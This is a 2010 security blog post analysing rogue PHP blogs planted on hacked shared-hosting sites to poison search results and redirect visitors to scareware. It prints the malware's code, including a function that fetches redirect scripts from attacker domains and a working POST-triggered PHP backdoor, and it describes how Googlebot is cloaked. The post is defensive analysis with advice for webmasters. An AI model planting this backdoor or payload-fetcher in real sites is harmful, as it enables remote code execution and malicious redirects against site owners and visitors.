msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Internals of Rogue Blogs

   17 Mar 10   Filed in Website exploits

Back in November, I wrote about rogue blogs created in subdirectories of legitimate websites. The blogs poisoned Google search results for millions of relatively unpopular keywords (the long tail) redirecting visitors to scareware websites. This hack mainly affected sites hosted on Servage network.

Recently I’ve been contacted by one of Servage clients who found his sites hacked:

I noticed the anomalous traffic to domains that are essentially either completely parked or just used for email addresses (SMTP forwarding rather than anything ‘clever’ with webmail.) That led me to the file structures and a quick google led me to your site.

He sent me the offending files he found under his account (thanks Matthew). Now I can share my analysis of the files with you.

In my previous post, I speculated about the internal structure of the rogue blogs. Now that I have the files, I can say that all my guesses proved to be correct.

Blog engine

Indeed, a full-featured yet minimalistic PHP blog engine powers the rogue blogs.

The whole engine consists of only 4 files:

  • index.php – main file of the engine. Less than 500 lines of PHP code. Less than 18K bytes on disk.
  • template.php – template of web pages that uses the data provided by the index.php. About 20 Kbytes.
  • categories.dat – serialized blog categories.
  • .htaccess – rewrite rules to support SEO-friendly URLs.

And this engine is indeed anonymous. I couldn’t find any credits. No names, not licenses. Just the code. The only clue I found was this User-Agent string of the ping requests: WeirD blog engine.

Features

The engine can do pretty much everything you expect a blog engine should be able to do.

  • add/remove entries
  • break down entries by categories
  • display entries in chronological order
  • support SEO-friendly URLs
  • notify services like Ping-O-Matic, Technorati, Google Blogsearch, Weblogs about new posts.
  • provide RSS feeds
  • support trackbacks
  • support custom templates

Flat files

The entries (there are hundreds of them) are stored in flat .txt files in the same directory. This makes the engine database-independent, so it can work on most servers. The only requirements are:

  • PHP
  • sufficient directory permissions to create files
  • Apache (to use SEO-friendly URLs)

Here’s a sample content of one of such text files (blonde-avril-lavigne.txt):

blonde avril lavigne
<img src="http://lh5.ggpht.com/elaing.zhang/SNxxYg5W9iI/AAAAAAAAUzE/Y75n9lb2xmg/s800/avril-lavigne80926003.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://lh3.ggpht.com/elaing.zhang/SNxxYxT7YwI/AAAAAAAAUzM/CZ832w22_Go/s800/avril-lavigne80926004.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://images.teamsugar.com/files/users/2/20652/34_2007/76335776.preview_0.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://www.judiciaryreport.com/images/avril-lavigne-pic.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://static.desktopnexus.com/wallpapers/4138-bigthumbnail.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />

As you can see the files are straight forward. The title on the first line followed by the content. In our case the content is five images (Google Image search results for corresponding keywords).

.htaccess

Since the purpose of the rogue blogs is poisoning of search results, “SEO-friendly” URLs is a required feature of the blog engine. This engine uses Rewrite rules in .htaccess files.

RewriteEngine On
RewriteRule ^category/([^/\.]+)/?$ index.php?category=$1 [L]
RewriteRule ^category/([^/\.]+)/page/([0-9]+)/?$ index.php?category=$1&page=$2 [L]
RewriteRule ^download/([^/\.]+)/?$ download.php?id=$1 [L]
RewriteRule ^page/([0-9]+)/?$ index.php?page=$1 [L]
RewriteRule ^([^/\.]+)/?$ index.php?id=$1 [L]
RewriteRule ^rss20.xml$ index.php?action=rss [L]

Malicious features

What makes these blogs malicious is following modifications to the original engine.

css.js

All blog pages contain the following script tag:

<script type="text/javascript" src="'.$blog['homepageUrl'].'css.js"></script>

The script redirects visitors that come from search engines to scareware sites. The content of this script constantly changes, redirecting people to new, not yet blacklisted sites. Here is how they do it behind the scenes:
function get_js_file($filename) {
if (!file_exists($filename) or time() - filemtime($filename) > 3600) {
$js_file = @file_get_contents('hxxp://t.xmlstats .in/b-m-2/'.$filename);
if (!$js_file) { $js_file = @file_get_contents('hxxp://t.jsonstats .in/b-m-2/'.$filename);}
if ($js_file) { @file_put_contents($filename, $js_file);}
}}

As you can see, this code tries to update the css.js file downloading its new content from hackers’ sites: t.xmlstats .in, t.jsonstats .in and, in some versions of the engine, t.jsstats .in.

This is how hackers make sure their blogs always redirect to currently active scareware sites.

Anti-Googlebot

Another modification is the code that detects requests from Google’s network checking the IP address against known Google’s IP ranges. If a request from Google is detected, the css.js file is replaced with css.google.js. This way hackers try to hide the malicious redirects from Googlebot when it indexes the rogue blogs. And the fact that I can see many such blogs in Google search results without any warnings shows that this simple trick does its job.

Different generations

In November, I discovered that there had been several different generations of the rogue blogs. Checking the files I received from Matthew, I found those generations sitting in separate subdirectories: blog, bmblog, bmsblog.

Backdoor script

Another interesting file I received is the index.php above the directories with rogue blogs:

<?php
error_reporting(E_ALL);
if (md5($_POST['5758e26e']) == '068f4646e8e1aefcdcd184e31e33af47') {
$test_func = create_function('', urldecode($_POST['f']));
$test_func();
}
?>

This is a typical backdoor script that executes whatever PHP code hackers send in parameters of POST requests.

Apparently, this script was used to create all other rogue files and directories. The question is how this backdoor script got there in the first place.

When Matthew asked Servage about what happened to his sites, they accused him of using insecure scripts, despite of the fact that his site didn’t use any scripts at all.

As I showed in my previous post, 85%+ of discovered rogue blogs are hosted by Servage so I’m almost sure some Servage-specific security hole was used. (Pure speculation: For example, it could be some php shell that hackers used to finds user accounts with writable directories. And the internal Servage architecture might help this script propagate to different physical servers. )

Still active

While the first generation of these rogue blogs appeared in April of the last year, this attack is still active. I can still see quite a few rogue bmsblog blogs with dates of the most recent posts in March of 2010. And some of them (not all though) can be found via Google search inurl:bmsblog/category 2010.

To Webmasters

While this particular attack mainly affects clients of Servage hosting company, it is quite typical for hacks that try to create rogue web pages in compromised web sites. So the following advice should be useful for most webmasters.

1. Make sure your server directories are only writable to you. This is especially important in shared hosting environment where hackers can use a compromised neighbor account to find writable directories in the rest sites on the same server and then create rogue content there.

2. Regularly scan your server for any suspicious files and directories.

3. Regularly check raw server logs. You may find requests to files that shouldn’t be there.

4. Pay special attention to POST requests. They are very popular for backdoor scripts. Just compile a list of files accessed via POST requests and check if you recognize any of them.

5. Many shared hosting plans include Webalizer. Every now and then check its reports. While they are normally not as useful as Google Analytics reports, they have one important advantage over Google Analytics – they track all files under your account, not only those where you inserted a tracking code. So, in Webalizer, you can see requests to files created by hackers, while Google Analytics completely misses this sort of data.

6. Hackers usually create rogue web pages to poison Google search results. So it’s natural to use Google to detect this sort of hacks. Regularly use Google to check what is indexed on your site. Use the site:you_site_domain.com search command.

7. Regularly check reports in Google Webmaster Tools. They may also reveal suspicious activity. Useful reports: Top search queries, Keywords, Links to your site.

8. If you find new directories with rogue files, disallow them in robots.txt. This will show Google that you don’t want those directories to be indexed. Otherwise, even if you delete the files, Google may keep them in index for quite some time (who knows, maybe you removed them temporarily while, say, redesigning your site).

For example, if you find rogue files in /cgiproxy/bmsblog/ the robots.txt should be:
User-agent: *
Disallow: /cgiproxy/bmsblog/

9. And don’t forget about other types of hacks that mess with your existing files. Regularly check your site for consistency and any illicit content that hackers may inject into your web pages (this is where my Unmask Parasites service can help).

Call for information

This case is not completely investigated yet. For example, I still don’t know why it mainly hits Servage and how exactly it propagates. This information could help Servage clients prevent infection of their sites. And probably guys at Servage need this information too since it looks like they can’t stop this attack themselves (and it’s active for about a year now!!!)

And if you have interesting information about any other hacker attack, please share it with me and readers of this blog. I’m always looking for malicious files that webmasters find on their compromised servers. They can tell a lot about how the attacks work. So before deleting any offending content, consider contacting me first.

Thanks for reading this blog. Your comments are welcome.

Related posts:

Reader's Comments (4)

  1. |

    While using robots.txt to disallow the folders in question will eventually work, you’ll be left with a large number of URL-only listings for those pages in the SERPs for a very long time.

    A more effective method would be to create an HTML file somewhere that includes the <meta name=”robots” content=”noindex,nofollow,noarchive”> directive and then to internally rewrite all requests for any affected URL, to this page.

    RewriteEngine On
    RewriteRule ^(bm(s)?)?blog/ /noindex.html [NC,L]

    This will see far quicker and more effective removal from searchengine results.

    An alternative method is to return 404 Not Found, or better still a 410 Gone response for all of those URLs. That’s also an effective method.

    RewriteEngine On
    RewriteRule ^(bm(s)?)?blog/ - [G]

    I think I might use the noindex solution for a few weeks and then swap to ‘Gone’ once searchengines have removed the majority of the rogue pages from the SERPs.

    As well as Google, don’t forget to check in Yahoo, Bing and others.

  2. |

    Thanks

    Indeed, disallow in robots.txt cannot guarantee immediate removal of the rogue pages from Google index.

    “410 Gone” works better than “404 Not Found” as it’s a more strong indication that the page is gone for good.

    Removed pages lingering in Google index for quite some time is a problem that affects many webmasters of hacked sites, so it would be really good do identify the most efficient way to get rid of them.

    I didn’t try this <meta name=”robots” content=”noindex,nofollow,noarchive”> method. How quick is it?

  3. |

    [...] a hacked PHP web application. Fraudsters often use compromised websites, but also sometimes use special blog software. Serving this kind of browser-specific content is nothing new, but it has previously tended to be [...]

  4. |

    [...]  недавно документировал, как минимум,   два  образца  вредоносного ПО,  которое внедряется в блоги и [...]